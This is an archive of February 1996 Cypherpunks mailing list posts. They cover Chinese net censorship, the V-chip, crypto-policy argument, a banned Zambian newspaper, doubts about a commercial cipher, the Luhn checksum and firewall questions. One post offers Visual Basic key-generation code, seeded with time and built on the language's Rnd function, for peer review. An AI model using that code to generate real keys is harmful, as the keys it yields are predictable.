To: cypherpunks@toad.com
Subject: Re: Firewall USA to Firewall China
In-Reply-To: <199602132225.RAA29121@bb.hks.net>
Message-ID: <199602140540.XAA09402@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> This would hose 93% of the subversive stuff on the 'net.

I guess I've gotten turned around on this -- last week I was arguing your 
position.

But:  China's problem is internal, not external, and it's political, not 
sexual.  Let's assume that they can build a successful firewall -- 
despite the fact that the people here on this list who design and install 
such firewalls for a living don't believe that the Chineese plan is 
feasible.  Let's assume that they can prevent people from grabbing photos 
from playboy.com.  So what?

Who's in a position to formulate devastating criticisms of China's
government?  Americans?  Or people who live under the system and
understand it?  And what's subversive, anyway?  Breasts enhanced with
silicon and airbrushing, or plain honest talk about liberty and
government? 

Any net that lets the Chineese people publish and talk to one another is 
going to create problems for the government.

On top of that, the firewall isn't even going to keep out foreign traffic. 
The firewall model doesn't work for internal security -- it assumes that
the people on the inside are trustworthy, and it focuses on protecting the
internal net from people on the outside.  The Chineese have to deal with 
people on the inside trying to subvert the wall by building illicit links 
via telephone lines or satellite channels.

Let's put it another way.  Suppose a company has a strong firewall 
installed by a first rate security consultant.  If an employee who has 
access to the internal net puts a modem on his machine and lets anyone 
who wants to dial in and connect to the internal net, what good does the 
firewall do?  You can't come in over the Internet, but you can come in 
over a pots line.  Either way, you've got your access.

For what it's worth, I have a friend who just got a job with Apple's
operation in China.  According to him, Hong Kong is fully wired, but
mainland China only has about 5,000 net accounts outside of government or
acadamia.  All 5,000 of those accounts seem to be served by a single 64kbs
connection to the outside world, which suggests that they're email only.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@mockingbird.alias.net (Anonymous)
Date: Wed, 14 Feb 96 00:18:56 PST
To: cypherpunks@toad.com
Subject: Re: MS CryptoAPI (fwd)
In-Reply-To: <9602140028.AA28117@sulphur.osf.org>
Message-ID: <199602140812.AAA13162@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz (rsalz@osf.org) wrote:
> Okay, so how the hell did Microsoft get export approval for this?

They didn't.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 14 Feb 96 01:48:06 PST
To: Alan Olsen <alano@teleport.com>
Subject: Re: V-chips, CC, and Motorcycle Helmets
In-Reply-To: <2.2.32.19960212061802.00915f98@mail.teleport.com>
Message-ID: <Pine.3.89.9602140107.A9112-0100000@netcom11>
MIME-Version: 1.0
Content-Type: text/plain



It's real simple folks. Turn the damn set off.

If parents wont accept the responsiblity to monitor what their kids 
watch, then they get what they get. If I don't want my kids watching 
television when I am gone, then I take the remote with me, as that is the 
only way my TV works.

The V-chip, like every other type of electronic lockbox devised to date, 
is nothing more than a band aid trying to cover the real problem - lack 
of attention paid to one's children and what they are doing. A 
govermental solution designed to regulate and legislate morality. History 
has demonstrated that every time a government makes attempts to enforce 
what is considered the basic tenants of civilized behavior then the game 
has already been lost. The people and the politics have become so 
corrupted that no form of democracy will survive for long - as it is 
dependant on the individual's willingness to abide by the principle of 
personal honesty.

On Sun, 11 Feb 1996, Alan Olsen wrote:

> At 08:13 PM 2/11/96 -0800, Bill Frantz wrote:
> >The Dranged Mutand is far from deranged when he writes:
> >
> >At 12:09 PM 2/11/96 -0500, Deranged Mutant wrote:
> >...
> >
> >>And besides... why rate program just on violence?  Why not "quality" from 
> >>a variety of orgs?  Other content ratings, from various organizations.  
> >
> >...
> >
> >One thing the V-Chip gives us is the argument:  Now that parents have the
> >ability to control what their children watch, the government should turn
> >responsibility over to them and butt out.
> 
> Parents had that ability before.  Cable boxes have a "perental control key"
> on the side that enables them to lock out "offensive" channels.  It works
> quite well and is fairly hard for the kidlets to defeat.  (I used it to
> lockout the religious stations and home shopping channels.)
> 
> The "V-Chip" debate is a mirror of the one that occured when the cable
> channels were starting to become popular.  There was a big hue and cry about
> kids getting to the "naughty" channels without parent concent.  Seems most
> people do not even learn how the lockouts work.  (And are too lazy to learn.)
> 
> You have to remember that most of the people arguing for TV filters are
> looking for a way to make the "offensive" stuff go away for good.  (Either
> from some sort of rating system or a heavy handed FCC regulation or two.)
> And don't believe that the V-Chip will let you choose the rating service.
> It will be one centrally produced rating from some faceless and nameless
> entity.  I am willing to bet that we will see some pretty absurd examples of
> ratings (mild things getting heavy ratings above and beyond the call of
> sanity) in the future.
> 
> The v-chip will be less than useful as a real filter tool for those of us
> who have a different worldview than the censors.
> 
> Remember: "Future events like these will happen to you in the future!"
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon
> "I, Caligula Clinton... In the name of the Senate and the people of Rome!"
>    - Bill Clinton signing the CDA with the First Amendment bent over.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 14 Feb 96 00:40:17 PST
To: cypherpunks@toad.com
Subject: Why There Exists No Middle Ground in the Crypto-policy Debate
Message-ID: <199602140840.JAA12665@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Why There Exists No Middle Ground in the Crypto-policy Debate

[This message only appears to be posted anonymously, if you
 have the correct tools, you can learn my name and e-address.
 Take that auto-WWW indexers!]

Decius <decius@ninja.techwood.org> recently presented an essay,
entitled ``Crypto-Absolutism,'' which described ``Why and how the
middle ground should be found in the crypto-policy debate.''  The
essay is clearly wrong in its assumptions and thus its conclusions.
Given the perceived flaws in the assumptions, his commentary must be
rebutted.

Within the context of this rebuttal, ``T-Camp Cypherpunks'' are those
``Cypherpunks'' (whatever they are :-) that follow a technology
evolution-based line of reasoning to arrive at the inevitable coming
of crypto-anarchy.  As well, ``A-Camp Cypherpunks'' are those that
advocate crypto-anarchy because they like the social and political
implications.  It is possible to be an A-Camp Cypherpunk or a T-Camp
Cypherpunk without being the other.  Of course, it is quite possible
to be both.  It has often been said on Cypherpunks, that ``we'' are
not a ``we''.  Decius falls into a trap by assuming that all
Cypherpunks are in the A-Camp.  This mistake colors the entire essay.

The main problem with Decius' essay is that it assumes that
Cypherpunks _merely_ advocate crypto-anarchy.  In fact, T-Camp
Cypherpunks do not stop at this puny point.  They observe that
crypto-anarchy is the _likely_ _outcome_ of the current technology
trend (this trend is discussed below).  Note that this observation of
fulfillment, if correct, is a far stronger statement than merely
advocating that crypto-anarchy should happen or would be a really good
idea.

A-Camp Cypherpunks also advocate that this trend should be exploited
to its conclusion, sooner rather than later, to preempt any massive
government crackdowns that would only prolong the transition pains.
The rationale being that these supposed government crackdowns have no
place in the natural evolution of a free society.  And that the
continuance of a free society is preferable to that of a move towards
a police state, which would be required to facilitate the useless ---
in the end --- crackdown on this information technology.

Decius is also wrong when he states that crypto-anarchy means people
will never again be accountable or recognized (pure A-Campers might
like this to be true, although I doubt it).  In the T-Camper's view,
crypto-anarchy means that people have the choice of when they wish to
be accountable and recognized for their statements and information
movement-related actions and when they wish otherwise.  People are not
forced under the crypto-anarchy model to be unaccountable or
unrecognizable.  Likewise, the crypto-anarchy model allows people to
ignore those that are unaccountable and unrecognizable, if they wish.
Decius fails to recognize that people could be recognized, and even
paid, for example, when operating under a pseudonym instead of
completely anonymously (this concept links two Cypherpunks favorites:
untraceable anonymous e-cash and anonymous reputations).

As primary counter-points to Decius on this issue:
- - The people who wrote the Federalists' Papers did so anonymously,
  yet I suspect that all were well-known and transacted business and
  other politics under their ``real names'' most of the time.
- - Individual articles are anonymously published in the _The Economist_
  yet I suspect that people are being paid to contribute information
  to this newspaper (at least, I know I am paying a lot per year, for
  a newspaper, to get the information :-).
- - The recently released ``Primary Colors'' book by Anonymous.  Yet
  this person, if the publisher is to be believed, is well-known to
  President Clinton (I think it may all just be a good marketing scam :-).

Back to the main point of unstoppable --- in a free society, at least
- --- technology trends.  Decius has not, but must, account for the
following change due to technology: Up until now, communication system
deployers (e.g. The Phone Companies) have been basically blackmailed
(through easily applied laws and licensing) into creating systems with
backdoors for government's use.  As system intelligence moves to the
end-user devices away from the internal network devices and encryption
moves to end-to-end encryption from link-based or non-existent
encryption, this form of blackmail will no longer work since there
will no longer be a small number of easily controlled entities
building and deploying the systems.  There will be open standards for
the interconnect itself [IPng or whatever].  And anyone will be able
to implement end-user devices that layer end-to-end encryption on top
of the raw interconnect services provided by the new network model.
In some ways, we have already arrived at the new interconnect model:
the Internet based upon IP.  In the form of today's computers, we also
have a rudimentary incarnation of the required intelligent end-user
device.

In sum, I am a T-Camp Cypherpunk not because I necessarily think
crypto-anarchy is a good idea but rather because the technology trend
will continue to make it happen.  I also happen to be an A-Camp
Cypherpunk but it is for the reason that I am a T-Camper alone that I
derive that there can be no compromise on the issue of crypto-policy.
Not only would it be a bad idea to compromise, but also any compromise
will fail due to continuing changes in technology that favor
intelligence in the end-user devices and end-to-end encryption over
intelligence in the internal network components and easily controlled
encryption.  It is better to see the technology trend and embrace it
to prepare for the new crypto-anarchy to come.  ~``Those that prepare
for the change will have a lot of success, while those that ignore the
technology trend in this area will be left behind.''~  Truer words have
never been spoken.

Regards,
Loren

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSGeTP8de8m5izJJAQFFrQP/ZQFu64mGC/u4YC7jAsnv22Cx3Eub+xVw
i3IYX7aHJopfG3g6IVifaGuEJmHxF6mZDHj+YSS/9fQfHUm7QZtoXmgmvxgWpP3s
KiUVLgYA3/cVfZn/6iOUHlQCehzj2N4IPdW2QGWbe2rbk1i1YaiGLpnB+RRXo4nW
r7mKrSVOjOQ=
=TIOb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 14 Feb 96 09:16:01 PST
To: unicorn@schloss.li>
Subject: Re: Response to Perrygram
Message-ID: <ad47590d050210045742@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:04 PM 2/14/96, Robert Hettinga wrote:

>Perry and Tim,
>
>Why don't you two have sex already? The tension around here is getting
>unbearable...

And why don't you stop cluttering up the list with supposedly cute stuff
like this?

The couple of fairly short messages I've written in response to comments by
Perry are *as nothing* compared to the tons of verbiage in the Jim Bell
flame wars, the VZNUri/Detweiler flames, and even the Black Unicorn vs.
Netscape battle.

(If anyone can point to examples where I have engaged in protracted--more
than a couple of short messages--flames, please send me pointers to these
examples in private mail. I claim no especial morality, but I do think I've
stayed out of ongoing flame wars. I haven't even commented on
"assassination politics," even though it's just a watered-down and
poorly-thought-out version of what I wrote about in 1988...easier to just
delete the ramblings.)

And yet people like Bob and Uni feel compelled to throw their two cents in
about what a spectacle this is.

Get real.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Tue, 13 Feb 96 15:47:30 PST
To: cypherpunks@toad.com
Subject: NSA Mouse pad
Message-ID: <pgpmoose.199602141047.62193@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


I got a mouse pad in the mail today, mailed in
Maryland, but otherwise in a plain brown envelope.
It has nice, understated gold seal announcing it
is from the National Security Agency's Information
Systems Security Organization.

Obviously it wasn't export controlled.

I met these people at the recent USENIX
conference; there was an Air Force related trade
show in the center next door to the San Diego
Marriott. I was looking for people to submit
papers to the upcoming USENIX Unix and Network
Security Conference in San Jose in July. The
deadline for extended abstracts is one month away
(hint, hint).

Greg.

-- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Tue, 13 Feb 96 22:52:54 PST
To: cypherpunks@toad.com
Subject: Off topic - research query
Message-ID: <199602140649.RAA14008@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Howdy from Australia.

I am in the process of doing some research for an
article on our present bandwidth difficulties in 
Oz.

As a side issue, I wanted to cover the "overhead"
factor inherent in the TCP/IP (v4?) protocol 
which I understand is reduced under the proposed IPv.6 protocol.

I'd also like to discuss the "unfriendly" manner in which
web browsers such as Netscape hog resources by sending multiple
port access requests.

Can anyone point me towards recent papers which deal with these
issues?

TIA

Mark
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Tue, 20 Feb 96 20:27:32 PST
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602210426.UAA02338@pipebomb.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 2/20/96 -0600, you wrote:
>>  ** fairly remarkable coincidences.  Or is it that great minds
>>  think alike?
>
>heh, actually the Elementrix POTP sounds like plaintext-driven autokey  
>cipher and probably wouldn't be offensive if they weren't touting it as a  
>'OTP'...
>

Yes, that's true, but they also allude to "a large number of randomly
spinning dice" [rotors?] of which some are selected by contents [perhaps]
the autokey stream.  This from a discussion held with the POTP people.  The
allusion to the numerous 'dice' is what suggested to me a similarity with
the new [unknown but perfect, of course] system.  The autokey of POTP was
supposedly only part of the scheme....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 20 Feb 96 20:31:12 PST
To: cypherpunks@toad.com
Subject: Banned Zambian newspaper now on the Web
Message-ID: <Pine.3.89.9602202013.A19576-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


We now have the banned February 6 issue of _The Post_ online!

Frank Stuart kindly provided a copy of the text. I've HTMLized it, added
background documents and information about other international censorship 
efforts, and put it online at:
     http://www.cs.cmu.edu/~declan/zambia/

Zambia's president-cum-tyrant Frederick Chiluba has plenty of practice
censoring local dissidents, broadcasters, and newspapermen. Now, if he
likes, he can take on the Net. 

I've copied this message to the state news service, Zambia Today. Please
redistribute as appropriate. 

-Declan



------------------------------------------------------------------------
                http://www.cs.cmu.edu/~declan/zambia/
------------------------------------------------------------------------
   
      
                     NET CENSORSHIP AND ZAMBIAN DICTATORS
                                       
   By Declan McCullagh
   declan@well.com   
     
     
     Zambian President and Dictator-for-Life Frederick Chiluba has made a
     career of intimidating, harassing, arresting, and censoring those
     who disagree with him. Now his attempts to muzzle his critics have
     reached the Net -- specificially, Zamnet, the only Internet service
     provider in this impoverished African country.
     
     Chiluba has plenty of experience intimidating traditional media. At
     Chiluba's bidding, in December 1994 an armed paramilitary unit
     raided the Lusaka offices of The Post newspaper and its printer
     Printpak in Ndola looking for "seditious and defamatory material" --
     just as the presses were starting to roll. Germany's ambassador to
     Zambia, Peter Schmidt, who witnessed the raid, told InterPress
     Service that "the raid amounted to an attempt to intimidate the free
     press."
     
     A few days later, police arrested the top editors of the weekly
     Crime News and held them without bail and without filing charges.
     The journalists' offense? The newsweekly had revealed that Chiluba's
     wife was involved in drug trafficking.
     
     The year before, Chiluba sued The Weekly Post for libel after the
     paper reported on his shady financial dealings with South Africa.
     Chiluba also fired the head of the Zambia National Broadcasting
     Corporation for not broadcasting appropriately pro-government
     programming. In 1994, the ever-vigilant Chiluba introduced
     legislation to make the Zambian media answerable to a
     government-appointed secret tribunal with broad, undefined powers of
     censure and punishment.
     
     Chiluba's latest state-sponsored terrorism came in early February
     1996, after The Post published a report revealing the government's
     plans to hold a referendum on the adoption of a new constitution --
     plans Chilbua hoped to keep secret to the disadvantage of his
     political opponents. True to form, the hypersensitive Chiluba
     ordered his forces to invade the newspaper's office, ransack the
     paper's files, arrest the editors, and stop the presses. Security
     forces then sealed the offices of The Post.
     
     Chiluba's despotic behavior is reprehensible. Foreign governments
     immediately should yank the $1.8 billion in foreign aid Zambia
     receives each year and demand Chiluba's ouster. That failing, it's
     high time for the Zambian people to kick their thin-skinned tyrant
     out of office.

     
     February 16, 1996: Zamnet Communication Systems, which hosts the the
     web version of The Post, removes the online copy of the February 5
     issue after police threaten a raid. David Lush of the Media
     Institute of Southern Africa publishes an advisory.
     
     February 18, 1996: After reading Lush's advisory, I send an appeal
     requesting the text to several mailing lists.
     
     February 19, 1996: Frank Stuart contacts me when I'm logged into the
     WELL, saying he has a copy of the banned issue of the newspaper.
     
     February 20, 1996: This archive goes online after I translate
     Frank's text into HTML.

     
###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Tue, 20 Feb 96 20:47:16 PST
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602210446.UAA04948@pipebomb.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 PM 2/20/96 -0600, you wrote:
>Derek - We accept the gaunlet that Cyperpunks threw down, We will 
>provide the complete set of algoritms and free demo systems - we will not be 
>asking you to sign a NDA or anything like that, but we do want it to be a 
>two way street - if we put our head in your guillotene, to be chopped 
>off by the warlord and his minions, then we expect you to perform 
>reciprocal actions.

I'd like to go on record as being interested in looking at this.  Thanks!

>
>There has never been an idea advanced, where the orginator was not 
>thought of as a crank - Oliver Wendell Holmes Sr., "Over Teacups"
>
But not all those thought of as cranks are originators of worthwhile ideas ...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 20 Feb 96 20:47:19 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Need SSL firewall
In-Reply-To: <199602202203.RAA08526@bb.hks.net>
Message-ID: <Pine.SOL.3.91.960220204419.17944C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Can't you just run a dumb TCP relay? 

I used to have one somewhere, but I can't remember if I solarified it to 
run with multi-threading. I can try and dig it up, but it'd probably be 
faster for you to rewrite from scratch. I also have a ssl proxy for the 
client side which I wrote to demo the MITM attack, but that doesn't sound 
like what you need.

Simon

On Tue, 20 Feb 1996, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I need firewall software, preferably for free and running on an x86, that
> allows me to place an SSL webserver behind the firewall.
> 
> Any pointers?
> 
> TIA,
> 
> - -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBMSpFICoZzwIn1bdtAQF3YgGAnt2V+2sTgv7cHDu0k3HZ/664sFbYsu9V
> 4sWnsBNuJoMRVlG4RbxE/iERpu0nR6ZF
> =kPCC
> -----END PGP SIGNATURE-----
> 
> 

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Tue, 20 Feb 96 21:12:34 PST
To: thielj@cs.bonn.edu
Subject: Re:  Credit card numbers
Message-ID: <199602210511.VAA27800@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


Credit card check sums are based on the Luhn code.

Double the odd digits (1, 3, 5, etc.).  Use the sum of any 2-digit results.

Add all these numbers together to end up with one single digit.

Add this single digit to the sums of all the even digits.

The Luhn check digit is the mod 10 of that final subtotal.

For example 641205002340106 yields 4.


jwhiting




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Tue, 20 Feb 96 22:06:29 PST
To: thomas.womack@merton.oxford.ac.uk
Subject: PRNG in VB
Message-ID: <199602210605.WAA04260@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


I am answering the courteous inquiry from Thomas Womack about my request for 
help with a Visual Basic-only PRNG.  The premise is that those who will not or
can not afford hardware-based RNG's need something relatively secure in the
face of nothing at all or at best a lesser implementation.
 
I was reluctant to post code at first but rather asked for an interpretation 
of 10 runs of 9999 characters each.  I want peer review of source code but 
the threads in CypherPunks have been of a shall we say "low signal to noise" 
ratio of late.  Even more so than usual.  I just didn't want to feed the 
beast at this time.
 
That said, here's the outline of what I'm doing.  A splash screen loads first
displaying a random tip'o'the day about good key management.  I make use of 
the getcurrenttime() Win API a lot.  Said to have 50 millicent increments.
 
 
' Load splash screen first
Sub Form_Load ()
 
  ' first randomize using number of milliseconds since Windows was launched
  Randomize getcurrenttime()
 
  ' then rotate the tip'o'the day (30 currently, adding unknown some delay)
  For j = 1 To Int(n * Rnd + 1)
    Select Case j
      Case 1
        hint.Caption = "You passphrase is SUPPOSED to look like gibberish."
      ...
      Case n
        hint.Caption = "Change your passphrases often."
       End Select
  Next j
 
End Sub
 
' user clicks an OK button and up comes 2nd screen
Sub Form_Load ()
 
 ' mix things up
  Randomize getcurrenttime()
  
End Sub
 
 
' main screen's OK button
Sub Command1_Click ()
  
  Screen.MousePointer = 11
  scramble = ""
  keyLen = Val(keyLength.Text)
 
  ' repeat for the number of characters in the desired key
  For i = 1 To keyLen
    ' character set is ASCII 33 to ASCII 127
    scramble = scramble & Chr$(Int(94 * Rnd + 33))
    ' reseed
    Randomize getcurrenttime()
    ' now make it wobble to throw off any regularity in the loop
    ' this loop works because as the 7 increases, so does execution time
    For j = 1 To Int(7 * Rnd + 1)
      'idle
    Next j
  Next
  
  Screen.MousePointer = 0
  secondaryForm.keyLabel.Caption = scramble
 
End Sub
 
 
I'd be happy with an analysis of just how random this is.  My working 
assumption is that over a >8 character key, it beats trying to dream one 
up in one's head.  Besides the getcurrenttime API, I don't know what else 
to sample without an external DLL or hardware.
 
I started out attempting a keyboard timing routine but had second thoughts.
My software company has been doing bar code printing tools for years. Now 
we're moving from simple encoding to encryption.
 
After playing with RSA Secure briefly, I realized that one way to spoof a 
request to type willy nilly to initialize anything is to use a bar code 
scanner.  The common type is sometimes called a wedge because you plug your 
keyboard into it, and it into the keyboard port.  It's wedged between the 
keyboard and the CPU.
 
So when asked to type (obstensibly to input randomly timed events) I scan 
a very large block of bar coded material.  I fill the keyboard buffer at a 
fixed rate; the throughput of my scanner and PC.  If I scan a large bar 
code, yes, I'll fill the keyboard buffer as fast as possible.  Little 
entropy in my eyes.
 
Oh yeah, with common symbologies like Code 39 and Code 128, I can recreate 
the whole lower ASCII 128 including tabs, LF/CR, etc.  So I can tab to 
activate buttons in some UI scenarios. Or do macros any any combination that 
may include control characters.
 
So gang, what about bar code scanners being used to thwart random typing 
requests??
 
Jerry Whiting
jwhiting@azalea.com 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 20 Feb 96 21:25:23 PST
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.OSF.3.91.960220234608.19136B-100000@nic.wat.hookup.net>
Message-ID: <Pine.3.89.9602202353.C12893-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Feb 1996, Tim Philp wrote:

> 	The issue that I have not seen you address is one that has been
> brought up by several posters to this thread. This issue has to do with
> the fact that if you generate all of the keys (or whatever) what is to
> stop someone from offering one of your employees a LARGE bribe to cough up
> the keys? 

Not to mention GAK.  No bribe needed - just a "suit" showing up with what
looks like a court order. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 20 Feb 96 23:38:35 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Secure Split
Message-ID: <ad507ce9030210049c9d@[206.170.115.162]>
MIME-Version: 1.0
Content-Type: text/plain


I wrote a program which does secret sharing calles SecShare. It is on my
home page. As my first venture into crypto programming it is a major
kludge, but it does the job.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 20 Feb 96 20:55:41 PST
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220181451.16533A-100000@citrine.cyberstation.net>
Message-ID: <Pine.OSF.3.91.960220234608.19136B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



	I have been following this debate with some interest. I think that
it is quite clear that without your publishing the algorithms for your
product, you have to accept our skepticism obout your claims. You have
offered to do this so I will wait to make my judgement. 
	The issue that I have not seen you address is one that has been
brought up by several posters to this thread. This issue has to do with
the fact that if you generate all of the keys (or whatever) what is to
stop someone from offering one of your employees a LARGE bribe to cough up
the keys? 
	I don't think that anyone on this list would accept as secure any
system, no matter how clever, that relies on a human factor. People are
weak, properly used, mathematics is not. To suggest that such a security
breach would not occur with your procedures is disingenuous in the
extreme. 
	I am not trying to start (or continue) a flame war. I am willing
to learn more about your system before I pass judgement but I must tell
you, however, that I have heard nothing yet to give me any confidence 
that your system is secure. 

Regards,
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 20 Feb 96 21:03:21 PST
To: richier@onramp.net
Subject: unsubscribing info; pcmcia, anyone?
Message-ID: <Pine.3.89.9602202308.D7708-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Tue, 20 Feb 1996 14:50:00 -0600
> From: Nemesis <richier@Onramp.NET>
> To: cypherpunks@toad.com
> Subject: (no subject)

> How do i get off the mailing list??????

reply follows-------------------------------------------------------

to unsubscribe from the cypherpunks mailing list, send to:

		majordomo@toad.com

an e-mail message with the following text in the body of the message:

	unsubscribe cypherpunks richier@onramp.net

--
buenas suerte, nemesis.

p.s. -- a little hint: if your mail reader lets you save messages rec'd 
in folders or some such thing, you should save all the messages you get 
from mailing list software (like the first two messages you got from 
cypherpunks) in a sepaprate folder (like one called 'lists'.) Then you 
will be able to go back and unsubscribe or sign off when you want.

I'm thinking of putting the how to unsubscribe info for RFC-Dist and 
IETF-Announce (and maybe c.punks) in a .sig file - but I hate sigs so.
------------------------------------------------------------------------

obligatory crypto comment: has anyone looked at the iPower card and 
gotten one to play with? Where else could one get a PCMCIA card that was 
programmable and had a little memory on it? How hard would it be to make 
one - in other words, what could we get the cost down to for an 
encrypting pcmcia card? there couldn't be much to it, really, could there?
------------------------------------------------------------------
latest word from the other room: Buchanan 27%, Dole 26%, Lamar 13%




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Feb 96 00:20:10 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Web Browsers and Anonymous Mail (Was: NSA net trolling)
Message-ID: <199602210806.AAA28113@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>(0) I'm not aware of any class library objects or methods in stand-alone Java
>for calling the local mail transport agent. Is there any class library 
>support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool, 
>etc.} for applet calls to the local mail agent that's configured in the 
>browser ?  

A look at the documentation does not show one.  You may have to implement
the whole MTA protocol yourself :-(.  It does occur to me that such a
library would only be possible in a browser that knows (via configuration)
how to find MTAs.

Good luck - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
